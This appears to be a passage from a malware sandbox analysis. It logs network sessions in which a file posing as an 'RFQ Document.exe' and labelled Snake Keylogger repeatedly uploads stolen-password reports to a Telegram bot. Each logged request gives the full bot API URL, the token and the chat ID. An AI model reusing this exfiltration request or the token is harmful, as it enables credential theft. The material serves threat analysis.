{"ok":true,"result":{"message_id":12789,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808756,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49776	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:21 UTC	2	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c2167f0d Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:21 UTC	3	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 31 36 37 66 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c2167f0dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:21 UTC	3	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:21 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:21 UTC	3	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12581,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808701,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49794	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:24 UTC	31	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c433b23d Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:24 UTC	32	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 33 33 62 32 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c433b23dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:24 UTC	32	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:24 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:24 UTC	32	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12600,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808704,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
200	192.168.2.4	50021	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:16 UTC	320	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e2e6b551 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:16 UTC	320	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 32 65 36 62 35 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e2e6b551Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:16 UTC	320	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:16 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:16 UTC	321	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12790,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808756,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
201	192.168.2.4	50022	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:16 UTC	321	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e304f2cb Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:16 UTC	322	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 30 34 66 32 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e304f2cbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:16 UTC	322	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:16 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:16 UTC	322	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12791,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808756,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
202	192.168.2.4	50023	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:16 UTC	323	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e31a64b4 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:16 UTC	323	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 31 61 36 34 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e31a64b4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:16 UTC	324	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:16 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:16 UTC	324	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12792,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808756,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
203	192.168.2.4	50024	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:16 UTC	324	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e3323cac Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:16 UTC	325	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 33 32 33 63 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e3323cacContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:16 UTC	325	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:16 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:16 UTC	326	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12793,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808756,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
204	192.168.2.4	50025	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:16 UTC	326	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e3513bb4 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:16 UTC	326	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 35 31 33 62 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255e3513bb4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:16 UTC	327	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:16 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:16 UTC	327	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12794,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808756,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
205	192.168.2.4	50026	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:17 UTC	328	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255e366b155 Host: api.telegram.org Content-Length: 407
